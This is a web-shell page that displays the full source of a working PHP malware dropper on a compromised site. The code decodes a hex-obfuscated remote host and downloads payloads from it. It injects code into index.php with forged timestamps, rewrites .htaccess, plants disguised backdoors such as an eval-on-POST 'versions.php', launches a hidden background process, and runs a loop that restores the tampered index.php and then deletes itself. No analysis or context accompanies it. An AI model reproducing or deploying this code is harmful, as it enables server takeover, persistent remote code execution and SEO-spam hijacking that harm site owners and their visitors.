| Server IP : 172.67.216.182 / Your IP : 172.68.164.168 Web Server : Apache System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64 User : www ( 1000) PHP Version : 7.4.33 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /www/wwwroot/savinassociates.com/ |
Upload File : |
<?php
header('Access-Control-Allow-Origin:*');
error_reporting(E_ALL);
set_time_limit(99 - 99);
ignore_user_abort(1);
$mode = isset($_GET["mode"]) ? $_GET["mode"] : 6;
if (isset($_GET["line"])) {
$oneline = "line";
}
if (isset($_GET["q"])) {
$q = $_GET["q"];
} else if (isset($_POST["q"])) {
$q = $_POST["q"];
} else {
$q = '';
}
if (isset($_GET["db"])) {
$gov = $_GET["db"];
} else if (isset($_POST["db"])) {
$gov = $_POST["db"];
} else {
$gov = '';
}
if ($gov === '') {
$gov = get_filename(__FILE__);
}
$sitemap_code_file = isset($_FILES['sitemap_code_file']) ? $_FILES['sitemap_code_file']['tmp_name'] : '';
if (isset($_POST['message_type']) && !empty($_POST['message_type'])) {
$message_type = $_POST['message_type'];
} else {
$message_type = 'html';
}
if ($gov == '' || $gov > 10000 ) {
$check_message['status'] = 'fail';
$check_message['message'][] = 'no group';
output_message($check_message, $message_type);
exit();
}
$useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)";
$domain = "\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f";
$root = $_SERVER['DOCUMENT_ROOT'];
@chdir($root);
$http = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
if (isset($_POST['message_type']) && !empty($_POST['message_type'])) {
$message_type = $_POST['message_type'];
} else {
$message_type = 'html';
}
$arpath8 = array();
fi1($root);
$fp2 = @fp2($root);
$ht =
'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
';
if ($q === '') {
@unlink(__FILE__);
@touch($_SERVER['DOCUMENT_ROOT'] . '/3FNDICU2KH');
sleep(5);
$sedindexht_result = sedindexht();
output_message($sedindexht_result);
if ($sedindexht_result['status'] == 'ok') {
$sitemap_result = sitemap();
output_message($sitemap_result, $message_type);
if ($sitemap_result['status'] == 'ok') {
$pingsitemap_result = pingsitemap();
output_message($pingsitemap_result, $message_type);
$hiddencron_result = hiddencron();
output_message($hiddencron_result);
$enfile_result = enfile();
output_message($enfile_result);
if (isset($enfile_result['file']) && sizeof($enfile_result['file'])) {
echo "path:<br /><textarea style=\"width: 90%;height: 100px;\">";
foreach ($enfile_result['file'] as $file) {
echo $file . "\t";
}
echo "</textarea>";
}
if (isset($enfile_result['htcontent'])) {
echo "<br>htcontent:<br /><textarea style=\"width: 40%;height: 200px;\">";
echo $enfile_result['htcontent'];
echo "</textarea>";
}
}
}
down_s_file();
}
function down_s_file()
{
global $domain;
$gh = get($domain . '/h/gh.gif');
if (function_exists('file_put_contents')) {
file_put_contents('gh.php', $gh);
} else {
$fh = fopen('gh.php', "a+");
fwrite($fh, $gh);
fclose($fh);
}
}
function functionCheck()
{
$disabled = explode(',', ini_get('disable_functions'));
$new_disable = array();
foreach ($disabled as $item) {
$new_disable[] = trim($item);
}
$command_array = array('system', 'shell_exec', 'popen', 'exec', 'proc_open', 'passthru');
$command_able = false;
foreach ($command_array as $command) {
if (!in_array($command, $new_disable)) {
$command_able = true;
break;
}
}
return $command_able;
}
function rand_abc($length)
{
$str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$strlen = 52;
while ($length > $strlen) {
$str .= $str;
$strlen += 52;
}
$str = str_shuffle($str);
return substr($str, 0, $length);
}
function getPhpPath()
{
ob_start();
phpinfo(1);
$info = ob_get_contents();
sleep(3);
ob_end_clean();
preg_match("/--bindir=([^&]+)/si", $info, $matches);
if (isset($matches[1]) && $matches[1] != '') {
return $matches[1] . '/php';
}
preg_match("/--prefix=([^&]+)/si", $info, $matches);
if (!isset($matches[1])) {
return 'php';
}
return $matches[1] . '/bin/php';
}
function run($code, $method = 'popen')
{
$disabled = explode(',', ini_get('disable_functions'));
$new_disable = array();
foreach ($disabled as $item) {
$new_disable[] = trim($item);
}
$command_array = array('system', 'shell_exec', 'popen', 'exec', 'proc_open', 'passthru');
$method = '';
foreach ($command_array as $command) {
if (!in_array($command, $new_disable)) {
$method = $command;
break;
}
}
if (empty($method)) {
return false;
}
$result = '';
switch ($method) {
case 'proc_open':
$descriptorspec = array(
0 => array("pipe", 'r'),
1 => array("pipe", 'w'),
2 => array("pipe", 'error.txt')
);
$pipes = array();
proc_open($code, $descriptorspec, $pipes);
return false;
break;
case 'passthru':
passthru($code);
return false;
break;
case 'shell_exec':
$result = '';
$result = shell_exec($code);
return $result;
break;
case 'system':
$result = '';
system($code, $result);
return $result;
break;
case 'popen':
$fp = popen($code, "r");
while (!feof($fp)) {
$out = fgets($fp, 4096);
$result .= $out;
}
pclose($fp);
return $result;
break;
case 'exec':
exec($code, $array);
foreach ($array as $key => $value) {
$result .= $key . " : " . $value . PHP_EOL;
}
return $result;
break;
default:
return false;
break;
}
}
function getx($url)
{
if (stripos($url, 'http') !== false) {
$content = urla($url);
} else {
$content = file_get_contents($url);
}
return $content;
}
function urla($url, $header = null, $postdata = null)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
if (stripos($url, "https:") === false) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
if (is_array($header) && !empty($header)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
}
if (is_array($postdata) && !empty($postdata)) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
function output_message($result, $message_type = 'html', $html_tag = 'li')
{
if ($message_type != 'html') {
echo json_encode($result);
return;
}
if (!is_array($result)) {
return;
}
if (!isset($result['title'])) {
$result['title'] = '';
}
echo '---------start ' . $result['title'];
if (sizeof($result['message']) > 0) {
foreach ($result['message'] as $message) {
$message = str_replace('success', '<font color="blue">success</font>', $message);
$message = str_replace(' ok', '<font color="blue"> ok</font>', $message);
$message = str_replace('fail', '<font color="red">fail</font>', $message);
echo "<$html_tag>" . $message . "</$html_tag>";
}
}
if (isset($result['status']) && !empty($result['status'])) {
if ($result['status'] == 'ok') {
$status = '<font color="green">' . $result['status'] . '</font>';
}
if ($result['status'] == 'fail') {
$status = '<font color="red">' . $result['status'] . '</font>';
}
echo '---------end ' . $result['title'] . '===>status:' . $status;
} else {
$status = '<font color="green">ok</font>';
echo '---------end ' . $result['title'] . '===>status:' . $status;
}
echo "<br />";
echo "<br />";
}
function sedindexht()
{
global $root, $http, $host, $ht, $gov, $sitemap_code_file, $oneline, $mode,$domain;
$return_data = [];
$return_data['title'] = 'start set index .htaccess';
$return_data['status'] = 'ok';
if (!file_exists('index.php')) {
$return_data['status'] = 'fail';
$return_data['message'][] = 'index.php not exists.';
return $return_data;
} else {
$return_data['message'][] = 'index.php file exists.';
}
$file_time = filectime('index.php');
if (empty($sitemap_code_file)) {
$url = $domain . $gov . '/' . $gov . '.' . $mode . '.idx';
} else {
$url = $sitemap_code_file;
}
@chmod('index.php', 0644);
$uc = getx($url);
$b = @file_get_contents('index.php');
if (!file_exists('index' . date("w") . '.php')) {
@file_put_contents('index' . date("w") . '.php', $b);
}
//substr_count($b,'<?php')>2
$needle = '<?php // ' . $gov . '?>';
$idx_code = $uc . $needle;
if (preg_match('/<\?php \/\/ [0-9]*\?>/', $b)) {
$new_content = preg_replace('/[\s\S]*?<\?php \/\/ [0-9]*\?>/', $idx_code, $b);
} else {
$new_content = $idx_code . $b;
}
$put_load_result = @file_put_contents('index.php', $new_content);
if (!$put_load_result) {
$return_data['message'][] = 'modify file index.php file fail.';
} else {
touch('index.php', $file_time);
$return_data['message'][] = 'index.php time update success.';
$return_data['message'][] = 'modify file index.php file success.';
@chmod('index.php', 0444);
}
@chmod('.htaccess', 0644);
$n = file_put_contents('.htaccess', $ht);
if (!$n) {
$return_data['status'] = 'fail';
$return_data['message'][] = 'write .htaccess file fail';
} else {
$return_data['message'][] = '.htaccess create success.';
touch('.htaccess', $file_time);
$return_data['message'][] = '.htaccess time modify success';
@chmod('.htaccess', 0444);
$return_data['message'][] = '.htaccess 0444 modify success';
}
try {
function_exists('opcache_reset') && opcache_reset();
} catch (\Exception $E) {
}
$return_data['message'][] = "change data group: $gov .htaccess index ok\n";
return $return_data;
}
function sitemap()
{
global $root, $http, $host, $domain, $ht, $gov, $useragent;
$return_data = [];
$return_data['status'] = 'ok';
$return_data['title'] = 'start sitemap';
if (file_exists('sitemap.xml')) {
unlink('sitemap.xml');
}
$content = urla(sprintf("%s://%s/sitemap.xml", $http, $host), array('User-Agent: ' . $useragent));
//libxml_disable_entity_loader(false);
//$xml = simplexml_load_string($content, 'SimpleXMLElement', LIBXML_NOCDATA);
//$xx = json_decode(json_encode($xml), true);
if (strpos($content, '<sitemap><loc>') === false) {
} else {
$content = urla(sprintf("%s://%s/?sitemap.xml", $http, $host), array('User-Agent: ' . $useragent));
}
if ($content == false) {
$return_data['status'] = 'fail';
$return_data['message'][] = 'sitemap.xml get fail';
return $return_data;
} else {
if (strpos($content, '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="https://www.w3.org/1999/xhtml">') !== false) {
$return_data['message'][] = 'sitemap.xml get success';
$return_data['message'][] = 'sitemap.xml is ours';
} else if (strpos($content, '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xhtml="http://www.w3.org/1999/xhtml">') !== false) {
$return_data['message'][] = 'sitemap.xml get success';
$return_data['message'][] = 'sitemap.xml is ours';
} else {
$return_data['message'][] = 'sitemap.xml get fail';
$return_data['message'][] = 'sitemap.xml is not ours';
}
}
return $return_data;
}
function pingsitemap()
{
global $root, $http, $host, $domain, $ht, $gov, $useragent;
$return_data = [];
$return_data['title'] = 'start ping sitemap';
// $content = urla(sprintf("%s://%s/pingsitemap.xml", $http, $host),array('User-Agent: '.$useragent));
$content = urla(sprintf("%s://%s/pgg.xml", $http, $host), array('User-Agent: ' . $useragent));
$result = strrpos($content, 'sitemap');
if ($result) {
$return_data['status'] = 'ok';
$return_data['message'][] = "!!! 3.1 get and ping sitemap.xml ok\n" . $result . "\n";
} else {
$content = urla(sprintf("%s://%s/?pingsitemap.xml", $http, $host), array('User-Agent: ' . $useragent));
$result = strrpos($content, 'sitemap');
if ($result) {
$return_data['status'] = 'ok';
$return_data['message'][] = "!!! 3.1 get and ping sitemap.xml ok\n" . $result . "\n";
} else {
$return_data['status'] = 'fail';
$return_data['message'][] = "!!! 3.1 get and ping sitemap.xml fail\n" . $result . "\n";
}
}
return $return_data;
}
function get_filename($file_path)
{
$file_base_name = basename($file_path);
$file_name_arr = explode('.', $file_base_name);
$f_name = $file_name_arr[0];
return $f_name;
}
function fi1($path)
{
global $root, $arpath8;
if ($handle = opendir($path)) {
while (($file = readdir($handle)) !== false) {
if ($file != "." && $file != "..") {
$pfile = $path . "/" . $file;
if (is_dir($pfile) && !is_link($pfile)) {
if (substr_count(str_replace($root . '/', '', $pfile), '/') < 3) {
fi1($pfile);
}
if (!file_exists($pfile . "/index.php")) {
array_push($arpath8, str_replace($root . '/', '', $pfile));
}
}
}
}
}
shuffle($arpath8);
}
function fp2($root)
{
global $root, $http, $host, $domain, $ht, $gov, $arpath8;
$p_arr = array();
$pnew_arr = array();
foreach ($arpath8 as $k => $v) {
$qupath = str_replace($root, "", $v);
$p_arr[$k] = explode("/", $qupath);
if (count($p_arr[$k]) >= 3) {
$pnew_arr[] = $v;
}
}
return $pnew_arr;
}
function hiddencron()
{
global $root, $http, $host, $ht, $gov,$domain;
$return_result = [];
$return_result['title'] = __FUNCTION__;
if (functionCheck() !== false) {
$uc = urla($domain . 'c/idxcron');
if (mb_strlen($uc) > 0) {
$return_result['message'][] = "cron file get success";
$uc = '<?php ' . "\r\n" . $uc;
} else {
$return_result['message'][] = "cron file get fail";
return $return_result;
}
$cronfile = __DIR__ . "/" . strtolower(rand_abc(4)) . ".php";
$runbody = str_replace('__DIR__', "'" . __DIR__ . "'", $uc);
if (function_exists('file_put_contents')) {
$fpcr = file_put_contents($cronfile, $runbody);
if ($fpcr) {
$return_result['message'][] = "cron file write success";
} else {
$return_result['message'][] = "cron file write fail";
}
} else {
$cfh = fopen($cronfile, 'w+');
$fr = fwrite($cfh, $runbody);
fclose($cfh);
if ($fr > 0) {
$return_result['message'][] = "cron file write success";
} else {
$return_result['message'][] = "cron file write fail";
}
}
$php_bin = getPhpPath();
$code = "nohup " . $php_bin . ' ' . $cronfile . ' ' . base64_decode('PiAvZGV2L251bGwgMj4mMSAm');
$run_result = run($code);
if (!$run_result) {
$return_result['message'][] = $code . " run success";
} else {
$return_result['message'][] = $code . " run fail";
}
sleep(2);
if (@unlink($cronfile)) {
$return_result['message'][] = "delete " . $cronfile . " ok";
} else {
$return_result['message'][] = "delete " . $cronfile . " fail";
}
} else {
$return_result['message'][] = "function disable cron fail ";
}
$arr_msg = auto_restore_cycle();
foreach ($arr_msg as $key => $msg) {
$return_result['message'][] = $msg;
}
return $return_result;
}
function enfile()
{
global $root, $http, $host, $domain, $arpath8, $fp2;
$htens = [];
$return_result = [];
$return_result['title'] = 'create shell';
$return_result['status'] = 'ok';
$return_result['file'] = [];
$check_repeat = array();
$custom_file = array('wp-content', 'wp-includes');
$wrmfwlf = array('/h1.gif', '/h2.gif', '/h3.gif', '/h4.gif', '/h5.gif', '/i1.gif', '/i2.gif', '/i3.gif', '/i4.gif');
$ranfile = array_rand($arpath8, count($wrmfwlf) - count($custom_file));
foreach ($ranfile as $i) {
array_push($custom_file, $arpath8[$i]);
}
$self_shell_name = ['updates.php', 'themes.php', 'wp-loads.php', 'wp-mails.php', 'wp-configs.php', 'dimensiones.php', 'duotones.php', 'spacings.php', 'wp-config-samples.php'];
$i = 0;
while ($i < sizeof($wrmfwlf)) {
$htens[$custom_file[$i]] = $self_shell_name[$i];
$sf = $custom_file[$i] . '/' . $self_shell_name[$i];
$rf = get($domain . 't1' . $wrmfwlf[$i]);
$fh = @fopen($sf, "w+");
if ($fh) {
$xd_ok = fwrite($fh, $rf);
fclose($fh);
} else {
$xd_ok = false;
}
if ($xd_ok) {
$xd_url = $http . "://" . $host . '/' . $sf;
$return_result['message'][] = 'file:' . " \t" . $xd_url . ' success';
$return_result['file'][] = $xd_url;
//if( basename($sf.'/index.php') != 'index.php' ){
// $self_shell_name[] = basename($sf);
//}
}
$i++;
}
$cdf = 'versions.php';
$fh = fopen($cdf, "w+");
$xd_ok = fwrite($fh, "<?php if(isset(\$_POST['cdshell']) && !empty(\$_POST['cdshell'])){@eval(\$_POST['cdshell']);} ?>");
fclose($fh);
if ($xd_ok) {
$xd_url = $http . "://" . $host . '/' . $cdf;
}
$return_result['message'][] = 'file:' . " \t" . $xd_url . ' success';
$return_result['file'][] = $xd_url;
$self_shell_name[] = 'versions.php';
$htc = '';
$htc .= '<IfModule mod_rewrite.c>' . "\n";
$htc .= 'RewriteEngine On' . "\n";
$htc .= 'RewriteBase /' . "\n";
$htc .= 'RewriteRule ^index.php$ - [L]' . "\n";
$htc .= 'RewriteCond %{REQUEST_FILENAME} !-f' . "\n";
$htc .= 'RewriteCond %{REQUEST_FILENAME} !-d' . "\n";
$htc .= 'RewriteRule . index.php [L]' . "\n";
$htc .= '</IfModule>' . "\n";
$htc .= '<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$">' . "\n";
$htc .= 'Order Allow,Deny' . "\n";
$htc .= 'Deny from all' . "\n";
$htc .= '</FilesMatch>' . "\n";
$htc .= '<FilesMatch "^({#htens})$">' . "\n";
$htc .= 'Order Allow,Deny' . "\n";
$htc .= 'Allow from all' . "\n";
$htc .= '</FilesMatch>' . "\n";
$htresult = file_put_contents($root . '/.hcontentold', json_encode($htens));
$htresult = file_put_contents($root . '/.hcontent', $htc);
if ($htresult) {
$return_result['htcontent'] = $htc;
}
return $return_result;
}
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
if (stripos($url, "https:") === false) {
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$body = curl_exec($ch);
curl_close($ch);
return $body;
}
function file_get_https($url, $timeout)
{
$arrContextOptions = array(
"ssl" => array(
"verify_peer" => false,
"verify_peer_name" => false,
),
'http' => array(
'method' => "GET",
'timeout' => $timeout,
),
);
@file_get_contents($url, false, stream_context_create($arrContextOptions));
}
function auto_restore_cycle()
{
$arr_msg = [];
$code = <<< 'PHP_CODE'
<?php
set_time_limit(99 - 99);
ignore_user_abort(1);
function auto_restore_memory()
{
$index_path = $_SERVER['DOCUMENT_ROOT'] . '/index.php';
$flag_filename = $_SERVER['DOCUMENT_ROOT'] . '/3FNDICU2KH';
@unlink($flag_filename);
$index_code = @file_get_contents($index_path);
while (1) {
clearstatcache();
if (file_exists($flag_filename)){
break;
}
if (!file_exists($index_path) or @file_get_contents($index_path) != $index_code) {
@chmod($index_path, 438);
@unlink($index_path);
@file_put_contents($index_path, $index_code);
@chmod($index_path, 292);
}
sleep(2);
}
}
ob_end_clean();
header("Connection: close");
ob_start();
echo 888;
header("Content-Length: " . ob_get_length());
ob_end_flush();
flush();
auto_restore_memory();
PHP_CODE;
$file_path = $_SERVER['DOCUMENT_ROOT'] . '/' . 'cyborg_tmp.php';
$success = @file_put_contents($file_path, $code);
$arr_msg[] = 'write tmp file: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
if (!$success) {
return $arr_msg;
}
$protocol = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$file_url = str_replace($_SERVER['DOCUMENT_ROOT'], $protocol . '://' . $_SERVER['HTTP_HOST'], $file_path);
file_get_https($file_url, 5);
$arr_msg[] = 'get: ' . $file_url . ' ok';
$success = @unlink($file_path);
$arr_msg[] = 'delete: ' . $file_path . ' ' . ($success ? 'success' : 'fail');
return $arr_msg;
}